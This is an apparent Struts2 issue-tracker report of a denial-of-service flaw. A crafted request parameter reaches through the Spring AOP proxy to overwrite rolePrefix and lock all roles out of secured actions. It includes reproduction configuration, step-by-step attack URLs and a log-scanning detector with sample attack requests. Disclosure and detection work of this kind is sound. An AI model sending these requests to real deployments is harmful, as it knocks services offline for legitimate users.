Details
- Type: Improvement
- Status: Closed
- Priority: Major
- Resolution: Fixed
- Fix Version/s: 2.3.32, 2.5.10
- Labels: Patch, Important
Description
This is a DoS attack example for the case where a Struts2 user relies on Spring to secure their actions, as described in the `Initializing Actions from Spring` section of the spring-plugin documentation.
Attack Steps:
- An anonymous user logs in as an authenticated user.
- Then tries
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
where `{action0-actionN}` are the actions available to users.
Attack Impacts:
By replacing `rolePrefix`, the attacker blocks access to the secured actions for all defined roles, even for users who authenticate via login, so the services are down and a webapp restart is required to get back to normal!
Configuration Example:
1. spring-security.xml

```xml
<global-method-security secured-annotations="enabled" proxy-target-class="true" />
<http auto-config="true" use-expressions="false">
    <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
</http>
<authentication-manager erase-credentials="false">
    <authentication-provider>
        <user-service>
            <user name="admin" password="admin" authorities="ROLE_ADMIN" />
            <user name="user" password="user" authorities="ROLE_USER" />
        </user-service>
    </authentication-provider>
</authentication-manager>
```

2. applicationContext.xml

```xml
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
```

3. struts.xml

```xml
<action name="admin" class="secureAction" method="admin">
    <result name="success" type="json" />
</action>
<action name="user" class="secureAction" method="user">
    <result name="success" type="json" />
</action>
```

4. SecureAction.java

```java
package me.zamani.yasser.ww_convention.actions;

import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }

    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}
```

5. Log in via
http://{ip}:{port}/login
as user.
6. Open
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
7. In another browser, log in via
http://{ip}:{port}/login
as admin.
8. Try to access
http://{ip}:{port}/admin
which fails!
9. Also repeat step 5 and try to open
http://{ip}:{port}/user
which also fails!
10. Services are down and a webapp restart is required to get back to normal.
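Because the parameter name in the request above walks through the Spring AOP proxy's `advisors[...].advice...` chain rather than an action property, attempts are easy to spot in web-server access logs. The scanner below is an added example, not code from this issue or from Struts; the log lines, client addresses and the Common Log Format layout are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path segments that belong to the Spring AOP / Spring Security proxy chain
# (taken from the attack URL in this issue), never to a legitimate action property.
PROXY_INTERNAL_SEGMENTS = {
    "advisors", "advice", "accessDecisionManager", "decisionVoters", "rolePrefix",
}

# Splits an OGNL-style name like "advisors[0].advice.rolePrefix" into segments.
_SEGMENT_RE = re.compile(r"[.\[\]]+")

# Common Log Format: client ident user [time] "request" status size
_CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+')

def suspicious_segments(param_name: str) -> set:
    """Return the proxy-internal segments found in one decoded parameter name."""
    # unquote() once more so a double-encoded name does not slip past the split.
    segments = {s for s in _SEGMENT_RE.split(unquote(param_name)) if s}
    return segments & PROXY_INTERNAL_SEGMENTS

def param_names(request_line: str) -> list:
    """Extract decoded query parameter names from 'GET /path?query HTTP/1.1'."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else parts[0]
    return [name for name, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]

def scan_access_log(lines) -> list:
    """Return (client, parameter name, sorted matched segments) for every hit."""
    hits = []
    for line in lines:
        m = _CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        client, request_line = m.group(1), m.group(2)
        for name in param_names(request_line):
            matched = suspicious_segments(name)
            if matched:
                hits.append((client, name, sorted(matched)))
    return hits

# Constructed sample lines: two mirror the issue's attack URL (the second one
# URL-encoded), the third is a benign request with an ordinary dotted property.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2017:10:00:00 +0000] "GET /user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Feb/2017:10:00:01 +0000] "GET /admin?advisors%5B1%5D.advice.accessDecisionManager.decisionVoters%5B0%5D.rolePrefix=x HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Feb/2017:10:00:02 +0000] "GET /user?user.name=alice&page=2 HTTP/1.1" 200 40',
]
```

Running `scan_access_log(SAMPLE_LOG)` reports the two requests from 10.0.0.5 and ignores the benign `user.name` request; the same segment check can be applied before parameter binding to reject such names outright.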